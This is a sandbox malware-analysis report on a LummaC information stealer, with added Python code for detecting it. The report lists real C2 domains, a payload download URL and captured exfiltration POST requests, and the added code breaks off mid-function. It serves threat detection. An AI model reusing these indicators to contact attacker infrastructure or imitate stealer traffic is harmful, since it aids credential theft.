
Windows Analysis Report
h226x41CQ6.exe

Overview

General Information

Sample name:h226x41CQ6.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:fc8506934f3f379af5f36cdccb0c17ca
Analysis ID:1600405
MD5:fc8506934f3f379af5f36cdccb0c17ca
SHA1:3bccadfcc48c2116389c53714e3be076592731b4
SHA256:5bd0a7c399000541ab5f7398af02d5ced96e4f3adcea59a63c35dcf890bdc8de

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign process
Joe Sandbox ML detected suspicious sample
LummaC encrypted strings found
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean / suspicious / malicious)
  • System is w10x64
  • h226x41CQ6.exe (PID: 7260 cmdline: "C:\Users\user\Desktop\h226x41CQ6.exe" MD5: FC8506934F3F379AF5F36CDCCB0C17CA)
    • h226x41CQ6.exe (PID: 7392 cmdline: "C:\Users\user\Desktop\h226x41CQ6.exe" MD5: FC8506934F3F379AF5F36CDCCB0C17CA)
    • WerFault.exe (PID: 7572 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
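The process tree above has a shape worth detecting on its own: the sample starts a second copy of its own image (PID 7260 spawns PID 7392, matching the "Creates a process in suspended mode" and "Injects a PE file into a foreign process" signatures below), and the parent then crashes, which WerFault.exe records with "-p 7260". The following Python is an added example, not the sandbox's own logic: the event records are constructed from this process tree, the parent of PID 7260 (not shown on the page) is a placeholder 0, and the field names pid, ppid, image and cmdline are an assumption modelled on Sysmon Event ID 1.

```python
"""Flag the process-tree shape in this report: a sample starting a second
copy of its own image (the usual prelude to writing a payload into a
suspended child) and then crashing, which WerFault.exe records against the
parent PID.  Added example, not the sandbox's own logic; the event records
are constructed from the process tree above, and the field names (pid, ppid,
image, cmdline) are an assumption modelled on Sysmon Event ID 1.
"""
import ntpath
from collections import defaultdict

SAMPLE = r"C:\Users\user\Desktop\h226x41CQ6.exe"

# Constructed from the report's process tree.  The parent of PID 7260 is not
# shown on the page, so 0 is used as a placeholder.
EVENTS = [
    {"pid": 7260, "ppid": 0, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 7392, "ppid": 7260, "image": SAMPLE, "cmdline": f'"{SAMPLE}"'},
    {"pid": 7572, "ppid": 7260, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260"},
]


def werfault_target(cmdline: str):
    """PID named by WerFault's '-p' switch (the faulting process), or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok == "-p" and tokens[i + 1].isdigit():
            return int(tokens[i + 1])
    return None


def find_self_spawn(events):
    """(parent_pid, child_pid) pairs where the child runs the parent's image."""
    image_of = {e["pid"]: e["image"].lower() for e in events}
    return [(e["ppid"], e["pid"]) for e in events
            if e["ppid"] in image_of and image_of[e["ppid"]] == e["image"].lower()]


def find_crashes(events):
    """{crashed_pid: werfault_pid} taken from WerFault.exe launches."""
    crashes = {}
    for e in events:
        if ntpath.basename(e["image"]).lower() == "werfault.exe":
            target = werfault_target(e["cmdline"])
            if target is not None:
                crashes[target] = e["pid"]
    return crashes


def assess(events):
    """Combine both signals: a process that spawned a copy of itself and was
    then reported crashed by WerFault is the shape a finished (or botched)
    injection leaves behind; either signal alone is only weak evidence."""
    spawns = find_self_spawn(events)
    crashes = find_crashes(events)
    children = defaultdict(list)
    for parent, child in spawns:
        children[parent].append(child)
    both = sorted(p for p in children if p in crashes)
    findings = [f"PID {p} started a copy of its own image as PID {c}" for p, c in spawns]
    findings += [f"PID {p} crashed; reported by WerFault PID {w}" for p, w in crashes.items()]
    return {
        "self_spawn": spawns,
        "crashes": crashes,
        "self_spawn_then_crash": both,
        "findings": findings,
        "suspicious": bool(both),
    }


if __name__ == "__main__":
    for line in assess(EVENTS)["findings"]:
        print(line)
```

A self-spawn on its own is common for legitimate installers and updaters, so the rule only scores when the parent is also the process WerFault names; in this run that is PID 7260, which crashed after its child PID 7392 carried on the network activity listed under Networking.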
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{
  "C2 url": [
    "pioneeruyj.sbs",
    "nervepianoyo.sbs",
    "conceptionnyi.sbs",
    "fightyglobo.sbs",
    "modellydivi.sbs",
    "smashygally.sbs",
    "platformcati.sbs",
    "qualifielgalt.sbs"
  ],
  "Build id": "H8NgCl--"
}
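The extracted configuration lists eight C2 domains, and the Suricata section below shows which two ET rule types fired for the one the sample actually used (2056706 for the DNS lookup of platformcati.sbs, 2056707 for it in the TLS SNI). The other seven domains produced no traffic in this run, so local detection for them has to be written from the configuration. The following Python is an added example, not tooling from the Joe Sandbox report: it turns the configuration above into one DNS-lookup rule and one TLS-SNI rule per domain, plus a low-priority rule for the JA3 hash listed under Networking. The domains and the JA3 hash are the ones on this page; the sid range (9000000 upward), the "LOCAL" message prefix and the $HOME_NET/$EXTERNAL_NET variables are assumptions for a local rule set.

```python
"""Turn the LummaC configuration extracted above into Suricata rules.

Added example, not tooling from the Joe Sandbox report. The C2 domains and
the JA3 hash are the ones shown on this page; the sid range, the msg prefix
and the $HOME_NET/$EXTERNAL_NET variables are assumptions for a local rule set.
"""
import re

# Copied from the report's "Malware Configuration Extractor" output.
LUMMA_CONFIG = {
    "C2 url": [
        "pioneeruyj.sbs", "nervepianoyo.sbs", "conceptionnyi.sbs",
        "fightyglobo.sbs", "modellydivi.sbs", "smashygally.sbs",
        "platformcati.sbs", "qualifielgalt.sbs",
    ],
    "Build id": "H8NgCl--",
}

# JA3 of the sample's TLS client, from the report's "Joe Sandbox View" line.
OBSERVED_JA3 = "a0e9f5d64349fb13191bc781f81f42e1"

LOCAL_SID_BASE = 9000000  # assumption: a private sid range for local rules

_HOST_RE = re.compile(r"(?!-)[a-z0-9-]{1,63}(?<!-)(\.[a-z0-9-]{1,63})+")


def normalise_domain(value: str) -> str:
    """Return the bare lowercase host from a config entry, a URL, or a
    defanged form such as 'platformcati .sbs' / 'platformcati[.]sbs'.
    Raises ValueError for anything that is not a hostname."""
    host = value.strip().lower()
    host = re.sub(r"^[a-z][a-z0-9+.-]*://", "", host)   # drop scheme
    host = host.split("/", 1)[0].split(":", 1)[0]       # drop path and port
    host = host.replace("[.]", ".").replace(" .", ".").replace(". ", ".")
    if not _HOST_RE.fullmatch(host):
        raise ValueError(f"not a hostname: {value!r}")
    return host


def c2_rules(config, sid_base=LOCAL_SID_BASE, family="LummaC"):
    """One DNS-lookup rule and one TLS-SNI rule per C2 domain, mirroring the
    two ET rule types (2056706 / 2056707) that fired in this sandbox run."""
    rules = []
    sid = sid_base
    for raw in config["C2 url"]:
        host = normalise_domain(raw)
        rules.append(
            f'alert dns $HOME_NET any -> any any '
            f'(msg:"LOCAL {family} C2 domain in DNS lookup ({host})"; '
            f'dns.query; content:"{host}"; nocase; isdataat:!1,relative; '
            f'classtype:domain-c2; sid:{sid}; rev:1;)'
        )
        rules.append(
            f'alert tls $HOME_NET any -> $EXTERNAL_NET any '
            f'(msg:"LOCAL {family} C2 domain in TLS SNI ({host})"; '
            f'tls.sni; content:"{host}"; nocase; endswith; '
            f'classtype:domain-c2; sid:{sid + 1}; rev:1;)'
        )
        sid += 2
    return rules


def ja3_rule(ja3, sid, family="LummaC"):
    """JA3 is a weak indicator: ET ships this very hash at severity 3
    ('Possible Malware') because many clients share it.  Emit it at
    priority 3 so it enriches an alert rather than driving one."""
    if not re.fullmatch(r"[0-9a-f]{32}", ja3):
        raise ValueError(f"not an MD5-style JA3 hash: {ja3!r}")
    return (
        f'alert tls $HOME_NET any -> $EXTERNAL_NET any '
        f'(msg:"LOCAL JA3 hash seen with {family} sample (low confidence)"; '
        f'ja3.hash; content:"{ja3}"; classtype:unknown; priority:3; sid:{sid}; rev:1;)'
    )


def build_ruleset(config=LUMMA_CONFIG, ja3=OBSERVED_JA3, sid_base=LOCAL_SID_BASE):
    """Full local rule set: 16 domain rules followed by the JA3 rule."""
    rules = c2_rules(config, sid_base)
    rules.append(ja3_rule(ja3, sid_base + len(rules)))
    return rules


if __name__ == "__main__":
    print("\n".join(build_ruleset()))
```

The `dns.query` and `tls.sni` sticky buffers, `endswith`, `ja3.hash` and the `domain-c2` classtype all exist in current Suricata releases; the DNS rule anchors the end of the name with `isdataat:!1,relative` so that a lookup of a longer name that merely contains the domain does not match.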
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security

Source | Rule | Description | Author
00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.1528754817.00000000012BD000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000004.00000003.1530149419.00000000012BC000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
(4 further memory-dump matches not shown)
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-27T14:54:13.879270+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49702 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:15.356568+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:16.739157+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49705 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:40.121324+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49838 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:41.576040+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49849 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:43.214282+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49860 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:46.133395+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49871 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:48.988318+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49892 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:14.198569+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49702 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:15.863766+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49703 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:49.797125+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49892 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:14.198569+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49702 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:15.863766+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49703 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:13.879270+0100 | 2056707 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49702 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:15.356568+0100 | 2056707 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49703 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:16.739157+0100 | 2056707 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49705 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:40.121324+0100 | 2056707 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49838 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:41.576040+0100 | 2056707 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49849 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:43.214282+0100 | 2056707 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49860 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:46.133395+0100 | 2056707 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49871 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:48.988318+0100 | 2056707 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49892 | 104.21.112.1 | 443 | TCP
2025-01-27T14:54:13.379336+0100 | 2056706 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61325 | 1.1.1.1 | 53 | UDP
2025-01-27T14:54:45.046611+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49860 | 104.21.112.1 | 443 | TCP


                AV Detection

Source: h226x41CQ6.exe | Avira: detected
Source: qualifielgalt.sbs | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/apieI | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/S | Avira URL Cloud: Label: malware
Source: pioneeruyj.sbs | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/api? | Avira URL Cloud: Label: malware
Source: fightyglobo.sbs | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/apip | Avira URL Cloud: Label: malware
Source: conceptionnyi.sbs | Avira URL Cloud: Label: malware
Source: nervepianoyo.sbs | Avira URL Cloud: Label: malware
Source: https://itsrevolutionmagnus.xyz/ | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/api(w | Avira URL Cloud: Label: malware
Source: https://itsrevolutionmagnus.xyz/a | Avira URL Cloud: Label: malware
Source: smashygally.sbs | Avira URL Cloud: Label: malware
Source: https://itsrevolutionmagnus.xyz/Pa/ | Avira URL Cloud: Label: malware
Source: https://itsrevolutionmagnus.xyz/Shnnfd.exe% | Avira URL Cloud: Label: malware
Source: modellydivi.sbs | Avira URL Cloud: Label: malware
Source: platformcati.sbs | Avira URL Cloud: Label: malware
Source: https://itsrevolutionmagnus.xyz/Shnnfd.exe | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/#HX | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/apiz | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/api | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/api~ | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/ | Avira URL Cloud: Label: malware
Source: https://platformcati.sbs/h | Avira URL Cloud: Label: malware
Source: h226x41CQ6.exe.7260.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["pioneeruyj.sbs", "nervepianoyo.sbs", "conceptionnyi.sbs", "fightyglobo.sbs", "modellydivi.sbs", "smashygally.sbs", "platformcati.sbs", "qualifielgalt.sbs"], "Build id": "H8NgCl--"}
Source: h226x41CQ6.exe | Virustotal: Detection: 79%
Source: h226x41CQ6.exe | ReversingLabs: Detection: 86%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: h226x41CQ6.exe | Joe Sandbox ML: detected
Source: h226x41CQ6.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49838 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49849 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49860 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49871 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49892 version: TLS 1.2
Source: h226x41CQ6.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                Networking

Source: Network traffic | Suricata IDS: 2056706 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (platformcati .sbs) : 192.168.2.7:61325 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49702 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49703 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49705 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49838 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49849 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49860 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49871 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2056707 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (platformcati .sbs in TLS SNI) : 192.168.2.7:49892 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49702 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49702 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49703 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49703 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49892 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49860 -> 104.21.112.1:443
Source: Malware configuration extractor | URLs: pioneeruyj.sbs
Source: Malware configuration extractor | URLs: nervepianoyo.sbs
Source: Malware configuration extractor | URLs: conceptionnyi.sbs
Source: Malware configuration extractor | URLs: fightyglobo.sbs
Source: Malware configuration extractor | URLs: modellydivi.sbs
Source: Malware configuration extractor | URLs: smashygally.sbs
Source: Malware configuration extractor | URLs: platformcati.sbs
Source: Malware configuration extractor | URLs: qualifielgalt.sbs
Source: DNS query: itsrevolutionmagnus.xyz
Source: Joe Sandbox View | IP Address: 104.21.112.1
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49702 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49705 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49838 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49849 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49860 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49871 -> 104.21.112.1:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49892 -> 104.21.112.1:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: platformcati.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 42
    Host: platformcati.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12839
    Host: platformcati.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15071
    Host: platformcati.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20396
    Host: platformcati.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 2451
    Host: platformcati.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 553130
    Host: platformcati.sbs
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 77
    Host: platformcati.sbs
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: platformcati.sbs
Source: global traffic | DNS traffic detected: DNS query: itsrevolutionmagnus.xyz
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: platformcati.sbs
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Date: Mon, 27 Jan 2025 13:54:14 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    X-Frame-Options: SAMEORIGIN
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ytAmym0fDG84%2BuNPN9G4V3Rqn5msHjz4g%2FlpdzaN3F09tKJaR8IZSx5%2FGdW5Q52YGbKIR9uzHM7NF2oJkJpOrJIQwf563tdd%2BX90LASK1N12ukWzU1ZUtSPT3kRsVfAyzuLc"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 90893bc64a38424b-EWR
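The eight requests captured above are the whole C2 conversation: every one is a POST to /api on platformcati.sbs under a Chrome/119 User-Agent (not the "TeslaBrowser/5.5" string Malpedia quotes for older builds). The first, 8-byte request carries no cookie and is the one answered by Cloudflare's 403 at 13:54:14 GMT; every later request carries the __cf_mw_byp cookie, and the five multipart uploads, 12839 to 553130 bytes, all reuse the boundary be85de5ipdocierre1, something a real browser never does. The following Python is an added example, not part of the Joe Sandbox report: it parses request heads and scores them on exactly those traits. The eight header blocks are constructed from the lines above (the sandbox did not capture bodies, so only header fields are used); the reuse threshold, the byte threshold and the WebKit boundary prefix are assumptions.

```python
"""Spot the check-in / exfiltration pattern in the HTTP requests captured above.

Added example, not part of the Joe Sandbox report. The eight header blocks
are constructed from the report's "HTTP traffic detected" lines (bodies were
not captured, so only header fields are used); the reuse threshold, the byte
threshold and the WebKit boundary prefix are assumptions.
"""
from collections import Counter
from typing import Optional

UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
COOKIE = "__cf_mw_byp=oqj6GlOFDUw4otTDRmTgEYfkKnxIxWW.2VDR7nFAfjM-1737986054-0.0.1.1-/api"
BOUNDARY = "be85de5ipdocierre1"


def _request(ctype: str, length: int, cookie: Optional[str]) -> str:
    """Rebuild one request head exactly as the report lists it."""
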